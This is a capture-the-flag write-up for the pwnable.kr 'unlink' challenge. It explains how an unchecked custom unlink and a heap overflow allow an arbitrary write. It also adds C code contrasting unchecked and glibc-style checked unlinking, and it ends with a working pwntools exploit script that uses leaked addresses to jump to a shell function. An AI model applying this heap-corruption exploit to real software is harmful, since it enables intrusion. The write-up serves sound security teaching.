pwnable: unlink
Source: Internet | Published: 北京行知实践园作文 | Editor: 程序博客网 | Time: 2024/06/08 18:51
Problem analysis

The program implements its own unlink routine with no checks at all, and it also has a heap overflow.
This is the classic unlink attack, so I won't go over it here.
```c
// unlink
bk_chunk = p->bk
fd_chunk = p->fd
bk_chunk->fd = fd_chunk
fd_chunk->bk = bk_chunk
```
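As an added example (not the challenge's source and not code from the writeup), here is the unchecked unlink above beside a hardened form that adds the glibc-style "corrupted double-linked list" consistency check, with a small driver that shows the check refusing overwritten fd/bk pointers; the OBJ struct name and field layout are assumptions.

```c
#include <stddef.h>

/* Added example, not the challenge binary's source. Chunk layout follows
 * the writeup's unlink: fd and bk pointers plus a small buffer (names assumed). */
typedef struct tagOBJ {
    struct tagOBJ *fd;
    struct tagOBJ *bk;
    char buf[8];
} OBJ;

/* The challenge's unlink as quoted above: no validation, so overwritten
 * fd/bk pointers turn the two stores into writes to attacker-chosen addresses. */
void unlink_unchecked(OBJ *p) {
    OBJ *bk = p->bk;
    OBJ *fd = p->fd;
    bk->fd = fd;
    fd->bk = bk;
}

/* Hardened form, modelled on glibc's "corrupted double-linked list" check:
 * both neighbours must still point back at p, or the unlink is refused.
 * Returns 0 on success, -1 when corruption is detected. */
int unlink_checked(OBJ *p) {
    OBJ *bk = p->bk;
    OBJ *fd = p->fd;
    if (fd->bk != p || bk->fd != p)
        return -1;
    bk->fd = fd;
    fd->bk = bk;
    return 0;
}

/* A <-> B <-> C, unlink B legitimately: returns 1 if the list is A <-> C. */
int demo_legit_unlink(void) {
    OBJ a = {0}, b = {0}, c = {0};
    a.fd = &b; b.bk = &a; b.fd = &c; c.bk = &b;
    if (unlink_checked(&b) != 0) return 0;
    return a.fd == &c && c.bk == &a;
}

/* Simulate the overflow: B's fd/bk now point at a victim object that does
 * not point back at B. Returns 1 if the check refuses and the victim is untouched. */
int demo_corrupted_unlink(void) {
    OBJ a = {0}, b = {0}, c = {0}, victim = {0};
    a.fd = &b; b.bk = &a; b.fd = &c; c.bk = &b;
    b.fd = &victim;  /* overwritten by the overflow */
    b.bk = &victim;
    if (unlink_checked(&b) != -1) return 0;
    return victim.fd == NULL && victim.bk == NULL;
}
```

The check is exactly what modern glibc performs before unlinking a free chunk, which is why this technique only works against hand-rolled list code like the challenge's.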
solv.py
```python
from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

# Run the challenge binary over the pwnable.kr ssh session
cn = ssh(host='pwnable.kr', port=2222, user='unlink', password='guest')
p = cn.process('./unlink')
elf = ELF('unlink')  # local copy of the binary, used for the shell() symbol
shell_addr = elf.symbols['shell']
# gdb.attach(p, 'b unlink\n')

# The binary prints a stack address and a heap address before reading input
p.recvuntil(b'here is stack address leak: ')
stack_leak = int(p.recvuntil(b'\n')[:-1], 16)
p.recvuntil(b'here is heap address leak: ')
heap_leak = int(p.recvuntil(b'\n')[:-1], 16)
log.info("stack leak {}".format(hex(stack_leak)))
log.info("heap leak {}".format(hex(heap_leak)))

stack2_addr = stack_leak + 0x14 - 0x8
heap2_addr = heap_leak + 0xc
payload = p32(shell_addr) + b'aaaa' * 3 + p32(stack2_addr) + p32(heap2_addr)
# raw_input('send payload')
p.sendline(payload)
p.interactive()
```